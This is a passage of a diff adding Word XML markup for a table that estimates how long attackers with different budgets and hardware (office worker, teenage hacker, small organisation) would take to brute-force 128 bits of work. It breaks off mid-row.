+                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                  </w:pPr>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:b/>
+                      <w:bCs/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                    <w:t>Time to do 128 bits of work</w:t>
+                  </w:r>
+                </w:p>
+              </w:tc>
+            </w:tr>
+            <w:tr>
+              <w:trPr>
+                <w:trHeight w:val="887"/>
+                <w:tblCellSpacing w:w="15" w:type="dxa"/>
+              </w:trPr>
+              <w:tc>
+                <w:tcPr>
+                  <w:tcW w:w="0" w:type="auto"/>
+                  <w:tcBorders>
+                    <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:right w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                  </w:tcBorders>
+                  <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+                  <w:vAlign w:val="center"/>
+                  <w:hideMark/>
+                </w:tcPr>
+                <w:p>
+                  <w:pPr>
+                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                  </w:pPr>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                    <w:t>Office Worker</w:t>
+                  </w:r>
+                </w:p>
+              </w:tc>
+              <w:tc>
+                <w:tcPr>
+                  <w:tcW w:w="0" w:type="auto"/>
+                  <w:tcBorders>
+                    <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:right w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                  </w:tcBorders>
+                  <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+                  <w:vAlign w:val="center"/>
+                  <w:hideMark/>
+                </w:tcPr>
+                <w:p>
+                  <w:pPr>
+                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                  </w:pPr>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                    <w:t>$200 (plus company provided laptop)</w:t>
+                  </w:r>
+                </w:p>
+              </w:tc>
+              <w:tc>
+                <w:tcPr>
+                  <w:tcW w:w="1695" w:type="dxa"/>
+                  <w:tcBorders>
+                    <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:right w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                  </w:tcBorders>
+                  <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+                  <w:vAlign w:val="center"/>
+                  <w:hideMark/>
+                </w:tcPr>
+                <w:p>
+                  <w:pPr>
+                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                  </w:pPr>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                    <w:t>AMD Ryzen 5 5600x 6 Cores</w:t>
+                  </w:r>
+                </w:p>
+              </w:tc>
+              <w:tc>
+                <w:tcPr>
+                  <w:tcW w:w="2044" w:type="dxa"/>
+                  <w:tcBorders>
+                    <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:right w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                  </w:tcBorders>
+                  <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+                  <w:vAlign w:val="center"/>
+                  <w:hideMark/>
+                </w:tcPr>
+                <w:p>
+                  <w:pPr>
+                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                  </w:pPr>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                    <w:t>51</w:t>
+                  </w:r>
+                </w:p>
+              </w:tc>
+              <w:tc>
+                <w:tcPr>
+                  <w:tcW w:w="2724" w:type="dxa"/>
+                  <w:tcBorders>
+                    <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:right w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                  </w:tcBorders>
+                  <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+                  <w:vAlign w:val="center"/>
+                  <w:hideMark/>
+                </w:tcPr>
+                <w:p>
+                  <w:pPr>
+                    <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                  </w:pPr>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                    <w:t>2^77 days</w:t>
+                  </w:r>
+                </w:p>
+                <w:p>
+                  <w:pPr>
+                    <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                  </w:pPr>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                    <w:t>2^68 years</w:t>
+                  </w:r>
+                </w:p>
+              </w:tc>
+            </w:tr>
+            <w:tr>
+              <w:trPr>
+                <w:trHeight w:val="312"/>
+                <w:tblCellSpacing w:w="15" w:type="dxa"/>
+              </w:trPr>
+              <w:tc>
+                <w:tcPr>
+                  <w:tcW w:w="0" w:type="auto"/>
+                  <w:tcBorders>
+                    <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:right w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                  </w:tcBorders>
+                  <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+                  <w:vAlign w:val="center"/>
+                  <w:hideMark/>
+                </w:tcPr>
+                <w:p>
+                  <w:pPr>
+                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                  </w:pPr>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                    <w:t>Solo teenage Hacker</w:t>
+                  </w:r>
+                </w:p>
+              </w:tc>
+              <w:tc>
+                <w:tcPr>
+                  <w:tcW w:w="0" w:type="auto"/>
+                  <w:tcBorders>
+                    <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:right w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                  </w:tcBorders>
+                  <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+                  <w:vAlign w:val="center"/>
+                  <w:hideMark/>
+                </w:tcPr>
+                <w:p>
+                  <w:pPr>
+                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                  </w:pPr>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                    <w:t>$10k</w:t>
+                  </w:r>
+                </w:p>
+              </w:tc>
+              <w:tc>
+                <w:tcPr>
+                  <w:tcW w:w="1695" w:type="dxa"/>
+                  <w:tcBorders>
+                    <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:right w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                  </w:tcBorders>
+                  <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+                  <w:vAlign w:val="center"/>
+                  <w:hideMark/>
+                </w:tcPr>
+                <w:p>
+                  <w:pPr>
+                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                  </w:pPr>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                    <w:t> </w:t>
+                  </w:r>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                    <w:t xml:space="preserve">Ryzen 9/ Intel Ultra 9 + </w:t>
+                  </w:r>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                    <w:t>RTX2000</w:t>
+                  </w:r>
+                </w:p>
+                <w:p>
+                  <w:pPr>
+                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                  </w:pPr>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                    <w:t xml:space="preserve"> </w:t>
+                  </w:r>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                    <w:t>(24 CPU Threads Used)</w:t>
+                  </w:r>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                    <w:t xml:space="preserve"> (5.7Ghz)</w:t>
+                  </w:r>
+                </w:p>
+              </w:tc>
+              <w:tc>
+                <w:tcPr>
+                  <w:tcW w:w="2044" w:type="dxa"/>
+                  <w:tcBorders>
+                    <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:right w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                  </w:tcBorders>
+                  <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+                  <w:vAlign w:val="center"/>
+                  <w:hideMark/>
+                </w:tcPr>
+                <w:p>
+                  <w:pPr>
+                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                  </w:pPr>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                    <w:t> </w:t>
+                  </w:r>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                    <w:t>328320</w:t>
+                  </w:r>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                    <w:t>0</w:t>
+                  </w:r>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                    <w:t>000000</w:t>
+                  </w:r>
+                </w:p>
+              </w:tc>
+              <w:tc>
+                <w:tcPr>
+                  <w:tcW w:w="2724" w:type="dxa"/>
+                  <w:tcBorders>
+                    <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:right w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                  </w:tcBorders>
+                  <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+                  <w:vAlign w:val="center"/>
+                  <w:hideMark/>
+                </w:tcPr>
+                <w:p>
+                  <w:pPr>
+                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                  </w:pPr>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                    <w:t>2.83</w:t>
+                  </w:r>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                    <w:t xml:space="preserve"> x 10^26 days</w:t>
+                  </w:r>
+                </w:p>
+                <w:p>
+                  <w:pPr>
+                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                  </w:pPr>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                    <w:t xml:space="preserve">Or </w:t>
+                  </w:r>
+                </w:p>
+                <w:p>
+                  <w:pPr>
+                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                  </w:pPr>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                    <w:t>7.75</w:t>
+                  </w:r>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                    <w:t xml:space="preserve"> x 10^</w:t>
+                  </w:r>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                    <w:t>2</w:t>
+                  </w:r>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                    <w:t>3 years</w:t>
+                  </w:r>
+                </w:p>
+              </w:tc>
+            </w:tr>
+            <w:tr>
+              <w:trPr>
+                <w:trHeight w:val="312"/>
+                <w:tblCellSpacing w:w="15" w:type="dxa"/>
+              </w:trPr>
+              <w:tc>
+                <w:tcPr>
+                  <w:tcW w:w="0" w:type="auto"/>
+                  <w:tcBorders>
+                    <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:right w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                  </w:tcBorders>
+                  <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+                  <w:vAlign w:val="center"/>
+                  <w:hideMark/>
+                </w:tcPr>
+                <w:p>
+                  <w:pPr>
+                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                  </w:pPr>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                    <w:t>Small Organisation</w:t>
+                  </w:r>
+                </w:p>
+              </w:tc>
+              <w:tc>
+                <w:tcPr>
+                  <w:tcW w:w="0" w:type="auto"/>
+                  <w:tcBorders>
+                    <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:right w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                  </w:tcBorders>
+                  <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+                  <w:vAlign w:val="center"/>
+                  <w:hideMark/>
+                </w:tcPr>
+                <w:p>
+                  <w:pPr>
+                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                  </w:pPr>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                    <w:t>$</w:t>
+                  </w:r>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                    <w:t>10</w:t>
+                  </w:r>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                    <w:t>0k</w:t>
+                  </w:r>
+                </w:p>
+              </w:tc>
+              <w:tc>
+                <w:tcPr>
+                  <w:tcW w:w="1695" w:type="dxa"/>
+                  <w:tcBorders>
+                    <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:right w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                  </w:tcBorders>
+                  <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+                  <w:vAlign w:val="center"/>
+                  <w:hideMark/>
+                </w:tcPr>
+                <w:p>
+                  <w:pPr>
+                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                  </w:pPr>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                    <w:t> </w:t>
+                  </w:r>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                    <w:t>10 *(</w:t>
+                  </w:r>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                    <w:t>Ryzen 9/ Intel Ultra 9 + RTX2000</w:t>
+                  </w:r>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                    <w:t>)</w:t>
+                  </w:r>
+                </w:p>
+                <w:p>
+                  <w:pPr>
+                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                  </w:pPr>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                    <w:t xml:space="preserve"> (24 CPU Threads Used) (5.7Ghz)</w:t>
+                  </w:r>
+                </w:p>
+              </w:tc>
+              <w:tc>
+                <w:tcPr>
+                  <w:tcW w:w="2044" w:type="dxa"/>
+                  <w:tcBorders>
+                    <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:right w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                  </w:tcBorders>
+                  <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+                  <w:vAlign w:val="center"/>
+                  <w:hideMark/>
+                </w:tcPr>
+                <w:p>
+                  <w:pPr>
+                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                  </w:pPr>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                    <w:t> </w:t>
+                  </w:r>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                    <w:t>30283200000000</w:t>
+                  </w:r>
+                </w:p>
+              </w:tc>
+              <w:tc>
+                <w:tcPr>
+                  <w:tcW w:w="2724" w:type="dxa"/>
+                  <w:tcBorders>
+                    <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
